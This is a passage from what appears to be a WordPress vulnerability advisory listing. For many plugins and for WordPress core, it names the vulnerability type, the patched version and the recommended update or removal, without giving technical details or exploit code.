Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Comments – wpDiscuz

Vulnerability: wpDiscuz <= 7.3.3
Patched Version: 7.3.4
Recommended Action: Update to version 7.3.4, or a newer patched version

Plugin: Tippy

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via tippy shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Classic Editor +

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.4
Recommended Action: Update to version 2.6.4, or a newer patched version

Plugin: Ditty – Responsive News Tickers, Sliders, and Lists

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.15
Recommended Action: Update to version 3.0.15, or a newer patched version

Plugin: Integration for Salesforce and Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms

Vulnerability: Open Redirect
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Custom Field For WP Job Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Qe SEO Handyman

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Marekkis Watermark-Plugin

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ووکامرس فارسی

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.9.8
Recommended Action: Update to version 5.9.8, or a newer patched version

Plugin: Product Reviews Import Export for WooCommerce

Vulnerability: CSV Injection
Patched Version: 1.4.9
Recommended Action: Update to version 1.4.9, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: BulletProof Security

Vulnerability: Stored Cross-Site Scripting
Patched Version: 6.1
Recommended Action: Update to version 6.1, or a newer patched version

Plugin: Customer Service Software & Support Ticket System

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.10.4
Recommended Action: Update to version 5.10.4, or a newer patched version

Plugin: Responsive Filterable Portfolio

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.20
Recommended Action: Update to version 1.0.20, or a newer patched version

Plugin: WooCommerce JazzCash Gateway Plugin

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Caldera Forms – More Than Contact Forms

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.9.5
Recommended Action: Update to version 1.9.5, or a newer patched version

Plugin: Akismet Anti-spam: Spam Protection

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress

Vulnerability: SQL Injection
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Razorpay for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.5.7
Recommended Action: Update to version 4.5.7, or a newer patched version

Plugin: FooGallery – Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.18
Recommended Action: Update to version 1.8.18, or a newer patched version

Plugin: ACF Photo Gallery Field

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: Aparat

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Slider Hero with Video Background, Animation

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 8.2.1
Recommended Action: Update to version 8.2.1, or a newer patched version

Plugin: Advanced Booking Calendar

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Popup Box – Create Countdown, Coupon, Video, Contact Form Popups

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: Crayon Syntax Highlighter

Vulnerability: Directory Traversal
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: Server Status by Hostname/IP

Vulnerability: SQL Injection
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: WP Cerber Security, Anti-spam & Malware Scan

Vulnerability: Access Bypass Control
Patched Version: 8.9.3
Recommended Action: Update to version 8.9.3, or a newer patched version

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting via ‘yrc_lang[Videos]’
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: simpleSAMLphp Authentication

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 13.2.2
Recommended Action: Update to version 13.2.2, or a newer patched version

Plugin: WooCommerce Product Carousel Slider

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: OnePress Opt-In Panda

Vulnerability: Missing Authorization on AJAX Actions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WRC Pricing Tables – Responsive CSS3 Pricing Tables

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Authenticated Remote Code Execution
Patched Version: 5.0.1
Recommended Action: Update to version 5.0.1, or a newer patched version

Plugin: Stream

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.9.3
Recommended Action: Update to version 3.9.3, or a newer patched version

Plugin: HAL

Vulnerability: No subtitle
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Core: WordPress

Vulnerability: Open Redirect via wp_validate_redirect
Patched Version: 3.7.13
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.13, 3.8.13, 3.9.11, 4.0.10, 4.1.10, 4.2.7, 4.3.3, 4.4.2

Plugin: Jobs for WordPress

Vulnerability: Authenticated (Author+) Cross-Site Scripting
Patched Version: 2.5.11
Recommended Action: Update to version 2.5.11, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Insecure Password Reset Mechanism
Patched Version: 3.9.1
Recommended Action: Update to version 3.9.1, or a newer patched version

Plugin: Community by PeepSo – Download from PeepSo.com

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.0.3.0
Recommended Action: Update to version 6.0.3.0, or a newer patched version

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: Cross-Site Request Forgery via ts_reset_tracking_setting
Patched Version: 5.14.2
Recommended Action: Update to version 5.14.2, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 6.10.5
Recommended Action: Update to version 6.10.5, or a newer patched version

Plugin: Hustle – Email Marketing, Lead Generation, Optins, Popups

Vulnerability: No subtitle
Patched Version: 7.6.6
Recommended Action: Update to version 7.6.6, or a newer patched version

Plugin: Adning Advertising

Vulnerability: Unauthenticated Arbitrary File Deletion via Path Traversal
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Anthologize

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 0.8.1
Recommended Action: Update to version 0.8.1, or a newer patched version

Plugin: Backup and Restore plugin – WordPress

Vulnerability: Authenticated (Admin+) Arbitrary File Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Plugin Logic

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Icegram Engage – Ultimate WP Popup Builder, Lead Generation, Optins, and CTA

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: WordPress Classifieds Plugin – Ad Directory & Listings by AWP Classifieds

Vulnerability: Arbitrary File Upload
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Participants Database

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: wp-html-sitemap

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple:Press Forum

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting via Profile Signatures
Patched Version: 6.8.1
Recommended Action: Update to version 6.8.1, or a newer patched version

Plugin: FL3R FeelBox

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Defender Security – Malware Scanner, Login Security & Firewall

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.4.6.1
Recommended Action: Update to version 2.4.6.1, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Insecure Direct Object References
Patched Version: 7.5
Recommended Action: Update to version 7.5, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Plugin: Button Generator – easily Button Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: Responsive WordPress Slider – Avartan Slider Lite

Vulnerability: Reflected Cross-Site Scripting via ‘asview-nouce’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Reflected Cross-Site Scripting and Information Disclosure
Patched Version: 7.1.14
Recommended Action: Update to version 7.1.14, or a newer patched version

Plugin: Kama Click Counter

Vulnerability: Blind SQL Injection
Patched Version: 3.5.0
Recommended Action: Update to version 3.5.0, or a newer patched version

Plugin: Insert Special Characters

Vulnerability: Regular Expression Denial of Service (ReDoS)
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Authenticated Settings Import to Privilege Escalation
Patched Version: 4.6.0.4
Recommended Action: Update to version 4.6.0.4, or a newer patched version

Plugin: Portable phpMyAdmin

Vulnerability: Authentication Bypass
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Electric Studio Client Login

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Duplicate Post

Vulnerability: SQL Injection
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Reflected Cross-Site Scripting via ‘post_status’
Patched Version: 5.12.6
Recommended Action: Update to one of the following versions, or a newer patched version: 5.12.6, 6.1.6

Plugin: Droit Elementor Addons – Widgets, Blocks, Templates Library For Elementor Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Product Feed PRO for WooCommerce by AdTribes – WooCommerce Product Feeds

Vulnerability: Settings Update to Stored Cross-Site Scripting
Patched Version: 11.0.7
Recommended Action: Update to version 11.0.7, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: GDPR/CCPA Cookie Consent <= 6.4.4
Patched Version: 6.4.5
Recommended Action: Update to version 6.4.5, or a newer patched version

Plugin: WP Microblogs

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Stop User Enumeration

Vulnerability: Username Enumeration Bypasses
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Woocommerce Vietnam Checkout

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Feedify – Web Push Notifications

Vulnerability: No subtitle
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: Login as User or Customer

Vulnerability: Missing Authorization to Arbitrary Plugin Installation/Activation
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Time Sheets

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.29.3
Recommended Action: Update to version 1.29.3, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Captcha Bypass
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Diary & Availability Calendar

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Business Intelligence Lite

Vulnerability: SQL Injection
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: JW Player for Flash & HTML5 Video

Vulnerability: Cross-Site Request Forgery leading to player deletion
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: ReDi Restaurant Reservation

Vulnerability: Missing Authorization
Patched Version: 23.0212
Recommended Action: Update to version 23.0212, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: SQL Injection
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Companion Auto Update

Vulnerability: Local File Inclusion
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: PixFields

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: TemplatesNext ToolKit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: Erident Custom Login and Dashboard

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 3.5
Recommended Action: Update to version 3.5, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: SQL Injection via option_id
Patched Version: 19.1.5.1
Recommended Action: Update to version 19.1.5.1, or a newer patched version

Plugin: Smart External Link Click Monitor [Link Log]

Vulnerability: SQL Injection
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Backup Migration

Vulnerability: Sensitive Information Exposure
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Webmaster Tools

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: TheCartPress eCommerce Shopping Cart

Vulnerability: Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Email posts to subscribers

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Stock Ticker

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 3.23.1
Recommended Action: Update to version 3.23.1, or a newer patched version

Plugin: Image Gallery with Slideshow Plugin

Vulnerability: Blind SQL Injection via imgid
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Content Staging

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hover Effects – easily create any hover effect

Vulnerability: Authenticated Local File Inclusion
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: BackWPup – WordPress Backup & Restore Plugin

Vulnerability: Authenticated (Administrator+) Directory Traversal
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: Copy Anything to Clipboard

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: Shopp

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Rockhoist Ratings

Vulnerability: SQL Injection
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: MailPress

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: DiveBook

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Image Regenerate & Select Crop

Vulnerability: Cross-Site Request Forgery on multiple AJAX actions
Patched Version: 7.2.0
Recommended Action: Update to version 7.2.0, or a newer patched version

Plugin: Coming Soon & Maintenance Mode by Colorlib

Vulnerability: Administrator+ Cross-Site Scripting
Patched Version: 1.0.99
Recommended Action: Update to version 1.0.99, or a newer patched version

Plugin: Church Admin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.7.30
Recommended Action: Update to version 3.7.30, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: Cross-Site Request Forgery to SQL Injection
Patched Version: 6.2.1
Recommended Action: Update to version 6.2.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Social Media Flying Icons | Floating Social Media Icon

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP EasyPay – Create Your Payment Forms to Pay with Square – Square for WordPress Plugin: Integrate Square with WordPress to Collect Payments

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: Animated Number Counters

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: FreshMail For WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CatalogX – Product Catalog Mode For WooCommerce

Vulnerability: Missing Authorization
Patched Version: 5.0.3
Recommended Action: Update to version 5.0.3, or a newer patched version

Plugin: WordPress InviteBox Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: video carousel slider with lightbox

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.23
Recommended Action: Update to version 1.0.23, or a newer patched version

Plugin: WP User Switch

Vulnerability: Authenticated (Subscriber+) Authentication Bypass via Cookie
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: CP Blocks

Vulnerability: Authenticated Stored Cross-Site Scripting via License ID settings
Patched Version: 1.0.15
Recommended Action: Update to version 1.0.15, or a newer patched version

Plugin: Slide Anything – Responsive Content / HTML Slider and Carousel

Vulnerability: Editor+ Cross-Site Scripting
Patched Version: 2.3.44
Recommended Action: Update to version 2.3.44, or a newer patched version

Plugin: Real Cookie Banner: GDPR & ePrivacy Cookie Consent

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.4.10
Recommended Action: Update to version 3.4.10, or a newer patched version

Plugin: BackWPup – WordPress Backup & Restore Plugin

Vulnerability: Directory Traversal
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: Relevanssi – A Better Search

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.8
Recommended Action: Update to version 3.3.8, or a newer patched version

Plugin: Duplicate Page and Post

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: WordPress Social Login

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Nooz

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Race Condition to Remote Code Execution
Patched Version: 9.2.0
Recommended Action: Update to version 9.2.0, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Authenticated (Subscriber+) Privilege Escalation
Patched Version: 5.1.5
Recommended Action: Update to version 5.1.5, or a newer patched version

Plugin: Podlove Podcast Publisher

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.5.6
Recommended Action: Update to version 3.5.6, or a newer patched version

Plugin: WP SVG Icons

Vulnerability: Cross-Site Request Forgery to Remote Code Execution
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: SendPress Newsletters

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.20.7.13
Recommended Action: Update to version 1.20.7.13, or a newer patched version

Plugin: Simple Yearly Archive

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: Health Check & Troubleshooting

Vulnerability: Cross-Site Request Forgery via health_check_troubleshoot_get_captures
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Maspik – Advanced Spam Protection

Vulnerability: Unauthenticated Stored Cross-Site Scripting via efas_add_to_log
Patched Version: 0.9.3
Recommended Action: Update to version 0.9.3, or a newer patched version

Plugin: Acumbamail

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.0.4.1
Recommended Action: Update to version 1.0.4.1, or a newer patched version

Plugin: Memphis Documents Library

Vulnerability: Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Uploadify Integration

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.10
Recommended Action: Update to version 2.0.10, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Local File Inclusion
Patched Version: 0.8.6.0
Recommended Action: Update to version 0.8.6.0, or a newer patched version

Plugin: EventPrime – Events Calendar, Bookings and Tickets

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: WordPress Popular Posts

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.3.4
Recommended Action: Update to version 5.3.4, or a newer patched version

Plugin: Email Encoder – Protect Email Addresses and Phone Numbers

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: plugnedit

Vulnerability: Cross-Site Request Forgery leading to Stored Cross-Site Scripting
Patched Version: 6.2.0
Recommended Action: Update to version 6.2.0, or a newer patched version

Plugin: Zoho CRM Lead Magnet

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.9.2
Recommended Action: Update to version 1.6.9.2, or a newer patched version

Plugin: FeedWordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2015.0426
Recommended Action: Update to version 2015.0426, or a newer patched version

Plugin: Loginizer

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: CSV Injection
Patched Version: 6.5.4
Recommended Action: Update to version 6.5.4, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Missing Authorization
Patched Version: 4.2.3.1
Recommended Action: Update to version 4.2.3.1, or a newer patched version

Plugin: Photoracer Plugin

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: VDZ Google Analytics or Google Tag Manager / GTM

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.4.9
Recommended Action: Update to version 1.4.9, or a newer patched version

Plugin: Blogstand Banner

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Copify

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: SQL Injection
Patched Version: 1.4.36
Recommended Action: Update to version 1.4.36, or a newer patched version

Plugin: Jupiter X Core

Vulnerability: Information Disclosure, Modification, and Denial of Service
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: WP eCommerce

Vulnerability: Missing Authorization
Patched Version: 3.8.14.4
Recommended Action: Update to version 3.8.14.4, or a newer patched version

Plugin: Dropshipping and affiliates for Amazon and woocommerce

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Floating Content Lite

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: File Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: Perfect Survey

Vulnerability: Unauthenticated Stored Cross-Site Scripting via IP
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Event Manager and Tickets Selling Plugin for WooCommerce – WpEvently – WordPress Plugin

Vulnerability: SQL Injection
Patched Version: 3.5.8
Recommended Action: Update to version 3.5.8, or a newer patched version

Plugin: Name Directory

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.27.2
Recommended Action: Update to version 1.27.2, or a newer patched version

